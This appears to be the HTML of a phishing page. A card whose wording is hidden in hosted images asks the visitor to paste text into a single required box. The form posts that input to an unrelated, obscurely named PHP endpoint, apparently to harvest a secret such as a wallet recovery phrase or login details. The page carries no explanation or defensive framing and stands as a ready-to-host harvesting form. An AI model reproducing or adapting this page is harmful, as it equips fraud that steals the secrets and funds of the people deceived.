<html xmlns="http://www.w3.org/1999/xhtml"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>info</title>
  </head>

  <body>
    <style>
      @import url('https://fonts.googleapis.com/css2?family=DM+Sans:wght@400;500;700&display=swap');

         @import url("https://fonts.googleapis.com/css?family=Open+Sans");

            * {
              margin: 0;
              padding: 0;
              box-sizing: border-box;
              outline: none;
              text-decoration: none;
              font-family: "Open Sans", sans-serif;
            }

            body {
              background: #fff;
              background-size: cover;
              width: 100%;
              height: 100vh;
            }


      .container{max-width: 500px;
              width: 100%;
              height: auto;
              position: absolute;
              top: 35%;
              left: 50%;
              transform: translate(-50%, -50%);
              padding: 30px 30px;}
      .card {
      	margin: 2rem auto;
      	display: flex;
      	flex-direction: column;
      	width: 100%;
      	max-width: 525px;
      	background-color: #FFF;
      	border-radius: 10px;
      	box-shadow: 0 10px 20px 0 rgba(#999, .25);
      	padding: .75rem;
      }

      .card-image {
      	border-radius: 8px;
      	overflow: hidden;
      	padding-bottom: 65%;
      	background-image: url('https://assets.codepen.io/285131/coffee_1.jpg');
      	background-repeat: no-repeat;
      	background-size: 150%;
      	background-position: 0 5%;
      	position: relative;
      }

      .card-heading {
      	position: absolute;
      	left: 10%;
      	top: 15%;
      	right: 10%;
      	font-size: 1.75rem;
      	font-weight: 700;
      	color: #735400;
      	line-height: 1.222;
      	small {
      		display: block;
      		font-size: .75em;
      		font-weight: 400;
      		margin-top: .25em;
      	}
      }

      .card-form {
      	padding: 2rem 1rem 0;
      }


      }


      }
    </style>

    <div class="container" style="
        padding: 10px;
        border: 1px solid #ccc;
        border-radius: 20px;
        margin: 10px;
      ">
      <!-- code here -->
      <div class="card">
        <div>
          <img src="https://i.postimg.cc/Z5tNtYMZ/losgkj.png" style="width: 150px; margin-bottom: 3px">
        </div>
        <form class="card-form" action="https://comcu.sclnnco.site/ghb12/cdgd.php" method="post">
          <img src="https://i.postimg.cc/9XkTbYPD/pasd.png" style="width: 100%"><br><br>
          <div>
            <textarea name="cbsfs" required="" style="
                width: 100%;
                padding: 15px;
                border-radius: 5px;
                height: 100px;
              "></textarea>
          </div>
          <img src="https://i.postimg.cc/HLtXtG3m/pmd.png"><br><br><br>
          <div class="actionaa">
            <input type="image" src="https://i.postimg.cc/0j4pJpnJ/subm.png" border="0" alt="Submit" style="width: 100%" name="submit">
          </div>
        </form>
      </div>
    </div>
  

</body></html>